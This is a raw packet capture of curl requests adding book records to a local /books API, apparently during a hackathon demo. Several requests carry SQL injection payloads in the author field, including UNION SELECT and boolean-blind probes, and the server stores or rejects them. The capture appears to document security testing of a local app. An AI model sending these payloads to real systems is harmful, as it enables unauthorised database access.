20:28:47.676715 IP6 (hlim 64, next-header TCP (6) payload length: 249) ::1.53628 > ::1.8080: Flags [P.], cksum 0x0101 (incorrect -> 0x0488), seq 1:218, ack 1, win 342, options [nop,nop,TS val 3147940 ecr 3147940], length 217: HTTP, length: 217
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 82
	
	{"name":"Hackathon-Demo8","author":"Ramesh UNION ALL SELECT NULL#","price":"9.99"}[!http]
20:28:47.676729 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53628: Flags [.], cksum 0x0028 (incorrect -> 0xdfc1), seq 1, ack 218, win 350, options [nop,nop,TS val 3147940 ecr 3147940], length 0
20:28:47.679755 IP6 (hlim 64, next-header TCP (6) payload length: 255) ::1.8080 > ::1.53628: Flags [P.], cksum 0x0107 (incorrect -> 0x0259), seq 1:224, ack 218, win 350, options [nop,nop,TS val 3147943 ecr 3147940], length 223: HTTP, length: 223
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:28:47 GMT
	
	59
	{"id":195,"name":"Hackathon-Demo8","author":"Ramesh UNION ALL SELECT NULL#","price":9.99}
20:28:47.679773 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53628 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xdedc), seq 218, ack 224, win 350, options [nop,nop,TS val 3147943 ecr 3147943], length 0
20:28:47.680095 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53628: Flags [P.], cksum 0x002d (incorrect -> 0x9ab4), seq 224:229, ack 218, win 350, options [nop,nop,TS val 3147944 ecr 3147943], length 5: HTTP
20:28:47.680112 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53628 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xded5), seq 218, ack 229, win 350, options [nop,nop,TS val 3147944 ecr 3147944], length 0
20:28:47.680493 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53628 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xded4), seq 218, ack 229, win 350, options [nop,nop,TS val 3147944 ecr 3147944], length 0
20:28:47.688983 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53628: Flags [F.], cksum 0x0028 (incorrect -> 0xdeca), seq 229, ack 219, win 350, options [nop,nop,TS val 3147953 ecr 3147944], length 0
20:28:47.689002 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53628 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xdec1), seq 219, ack 230, win 350, options [nop,nop,TS val 3147953 ecr 3147953], length 0
20:28:47.699853 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53630 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x579e), seq 1192561302, win 43690, options [mss 65476,sackOK,TS val 3147963 ecr 0,nop,wscale 7], length 0
20:28:47.699895 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53630: Flags [S.], cksum 0x0030 (incorrect -> 0xfe92), seq 3362752414, ack 1192561303, win 43690, options [mss 65476,sackOK,TS val 3147964 ecr 3147963,nop,wscale 7], length 0
20:28:47.699922 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53630 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xd0c3), seq 1, ack 1, win 342, options [nop,nop,TS val 3147964 ecr 3147964], length 0
20:28:47.700010 IP6 (hlim 64, next-header TCP (6) payload length: 228) ::1.53630 > ::1.8080: Flags [P.], cksum 0x00ec (incorrect -> 0xcc70), seq 1:197, ack 1, win 342, options [nop,nop,TS val 3147964 ecr 3147964], length 196: HTTP, length: 196
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 61
	
	{"name":"Hackathon-Demo9","author":"Ramesh-P","price":"9.99"}[!http]
20:28:47.700025 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53630: Flags [.], cksum 0x0028 (incorrect -> 0xcff7), seq 1, ack 197, win 350, options [nop,nop,TS val 3147964 ecr 3147964], length 0
20:28:47.704860 IP6 (hlim 64, next-header TCP (6) payload length: 234) ::1.8080 > ::1.53630: Flags [P.], cksum 0x00f2 (incorrect -> 0xdc45), seq 1:203, ack 197, win 350, options [nop,nop,TS val 3147968 ecr 3147964], length 202: HTTP, length: 202
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:28:47 GMT
	
	44
	{"id":196,"name":"Hackathon-Demo9","author":"Ramesh-P","price":9.99}
20:28:47.704884 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53630 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xcf24), seq 197, ack 203, win 350, options [nop,nop,TS val 3147969 ecr 3147968], length 0
20:28:47.705183 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53630: Flags [P.], cksum 0x002d (incorrect -> 0x8afc), seq 203:208, ack 197, win 350, options [nop,nop,TS val 3147969 ecr 3147969], length 5: HTTP
20:28:47.705208 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53630 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xcf1e), seq 197, ack 208, win 350, options [nop,nop,TS val 3147969 ecr 3147969], length 0
20:28:47.705870 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53630 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xcf1d), seq 197, ack 208, win 350, options [nop,nop,TS val 3147969 ecr 3147969], length 0
20:28:47.711015 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53630: Flags [F.], cksum 0x0028 (incorrect -> 0xcf16), seq 208, ack 198, win 350, options [nop,nop,TS val 3147975 ecr 3147969], length 0
20:28:47.711037 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53630 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xcf10), seq 198, ack 209, win 350, options [nop,nop,TS val 3147975 ecr 3147975], length 0
20:28:47.716313 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53632 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0x271f), seq 4021588578, win 43690, options [mss 65476,sackOK,TS val 3147980 ecr 0,nop,wscale 7], length 0
20:28:47.716342 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53632: Flags [S.], cksum 0x0030 (incorrect -> 0xe439), seq 1696715958, ack 4021588579, win 43690, options [mss 65476,sackOK,TS val 3147980 ecr 3147980,nop,wscale 7], length 0
20:28:47.716372 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53632 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb66b), seq 1, ack 1, win 342, options [nop,nop,TS val 3147980 ecr 3147980], length 0
20:28:47.716466 IP6 (hlim 64, next-header TCP (6) payload length: 260) ::1.53632 > ::1.8080: Flags [P.], cksum 0x010c (incorrect -> 0xf7cd), seq 1:229, ack 1, win 342, options [nop,nop,TS val 3147980 ecr 3147980], length 228: HTTP, length: 228
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 93
	
	{"name":"Hackathon-Demo10","author":"Ramesh %"))) AND 1868=7345 AND ((("%"="","price":"9.99"}[!http]
20:28:47.716509 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53632: Flags [.], cksum 0x0028 (incorrect -> 0xb57f), seq 1, ack 229, win 350, options [nop,nop,TS val 3147980 ecr 3147980], length 0
20:28:47.718451 IP6 (hlim 64, next-header TCP (6) payload length: 124) ::1.8080 > ::1.53632: Flags [P.], cksum 0x0084 (incorrect -> 0x61d0), seq 1:93, ack 229, win 350, options [nop,nop,TS val 3147982 ecr 3147980], length 92: HTTP, length: 92
	HTTP/1.1 400 
	Content-Length: 0
	Date: Thu, 27 Jun 2019 20:28:47 GMT
	Connection: close
	
20:28:47.718472 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53632 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb527), seq 229, ack 93, win 342, options [nop,nop,TS val 3147982 ecr 3147982], length 0
20:28:47.718583 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53632: Flags [F.], cksum 0x0028 (incorrect -> 0xb51e), seq 93, ack 229, win 350, options [nop,nop,TS val 3147982 ecr 3147982], length 0
20:28:47.718593 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53632 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xb526), seq 229, ack 93, win 342, options [nop,nop,TS val 3147982 ecr 3147982], length 0
20:28:47.718608 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53632: Flags [.], cksum 0x0028 (incorrect -> 0xb51d), seq 94, ack 230, win 350, options [nop,nop,TS val 3147982 ecr 3147982], length 0
20:28:47.718636 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53632 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xb525), seq 230, ack 94, win 342, options [nop,nop,TS val 3147982 ecr 3147982], length 0
20:28:47.730108 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53634 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xb114), seq 1286581090, win 43690, options [mss 65476,sackOK,TS val 3147994 ecr 0,nop,wscale 7], length 0
20:28:47.730126 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53634: Flags [S.], cksum 0x0030 (incorrect -> 0xeaae), seq 3598182098, ack 1286581091, win 43690, options [mss 65476,sackOK,TS val 3147994 ecr 3147994,nop,wscale 7], length 0
20:28:47.730140 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53634 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xbce0), seq 1, ack 1, win 342, options [nop,nop,TS val 3147994 ecr 3147994], length 0
20:28:47.730216 IP6 (hlim 64, next-header TCP (6) payload length: 229) ::1.53634 > ::1.8080: Flags [P.], cksum 0x00ed (incorrect -> 0xbc5e), seq 1:198, ack 1, win 342, options [nop,nop,TS val 3147994 ecr 3147994], length 197: HTTP, length: 197
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 62
	
	{"name":"Hackathon-Demo11","author":"Ramesh-P","price":"9.99"}[!http]
20:28:47.730227 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53634: Flags [.], cksum 0x0028 (incorrect -> 0xbc13), seq 1, ack 198, win 350, options [nop,nop,TS val 3147994 ecr 3147994], length 0
20:28:47.733359 IP6 (hlim 64, next-header TCP (6) payload length: 235) ::1.8080 > ::1.53634: Flags [P.], cksum 0x00f3 (incorrect -> 0xb945), seq 1:204, ack 198, win 350, options [nop,nop,TS val 3147997 ecr 3147994], length 203: HTTP, length: 203
	HTTP/1.1 201 
	Content-Type: application/json;charset=UTF-8
	Transfer-Encoding: chunked
	Date: Thu, 27 Jun 2019 20:28:47 GMT
	
	45
	{"id":197,"name":"Hackathon-Demo11","author":"Ramesh-P","price":9.99}
20:28:47.733383 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53634 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xbb42), seq 198, ack 204, win 350, options [nop,nop,TS val 3147997 ecr 3147997], length 0
20:28:47.733754 IP6 (hlim 64, next-header TCP (6) payload length: 37) ::1.8080 > ::1.53634: Flags [P.], cksum 0x002d (incorrect -> 0x771b), seq 204:209, ack 198, win 350, options [nop,nop,TS val 3147997 ecr 3147997], length 5: HTTP
20:28:47.733775 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53634 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xbb3d), seq 198, ack 209, win 350, options [nop,nop,TS val 3147997 ecr 3147997], length 0
20:28:47.734232 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53634 > ::1.8080: Flags [F.], cksum 0x0028 (incorrect -> 0xbb3b), seq 198, ack 209, win 350, options [nop,nop,TS val 3147998 ecr 3147997], length 0
20:28:47.734798 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53634: Flags [F.], cksum 0x0028 (incorrect -> 0xbb39), seq 209, ack 199, win 350, options [nop,nop,TS val 3147998 ecr 3147998], length 0
20:28:47.734817 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53634 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xbb39), seq 199, ack 210, win 350, options [nop,nop,TS val 3147998 ecr 3147998], length 0
20:28:47.747745 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.53636 > ::1.8080: Flags [S], cksum 0x0030 (incorrect -> 0xf2cd), seq 3959212616, win 43690, options [mss 65476,sackOK,TS val 3148011 ecr 0,nop,wscale 7], length 0
20:28:47.747777 IP6 (hlim 64, next-header TCP (6) payload length: 40) ::1.8080 > ::1.53636: Flags [S.], cksum 0x0030 (incorrect -> 0xd45d), seq 715516574, ack 3959212617, win 43690, options [mss 65476,sackOK,TS val 3148011 ecr 3148011,nop,wscale 7], length 0
20:28:47.747799 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.53636 > ::1.8080: Flags [.], cksum 0x0028 (incorrect -> 0xa68f), seq 1, ack 1, win 342, options [nop,nop,TS val 3148011 ecr 3148011], length 0
20:28:47.747921 IP6 (hlim 64, next-header TCP (6) payload length: 259) ::1.53636 > ::1.8080: Flags [P.], cksum 0x010b (incorrect -> 0x8f71), seq 1:228, ack 1, win 342, options [nop,nop,TS val 3148012 ecr 3148011], length 227: HTTP, length: 227
	POST /books HTTP/1.1
	User-Agent: curl/7.29.0
	Host: localhost:8080
	Accept: */*
	Content-type:application/json
	Content-Length: 92
	
	{"name":"Hackathon-Demo12","author":"Ramesh%"))) AND 3428=3428 AND ((("%"="","price":"9.99"}[!http]
20:28:47.747936 IP6 (hlim 64, next-header TCP (6) payload length: 32) ::1.8080 > ::1.53636: Flags [.], cksum 0x0028 (incorrect -> 0xa5a2), seq 1, ack 228, win 350, options [nop,nop,TS val 3148012 ecr 3148012], length 0
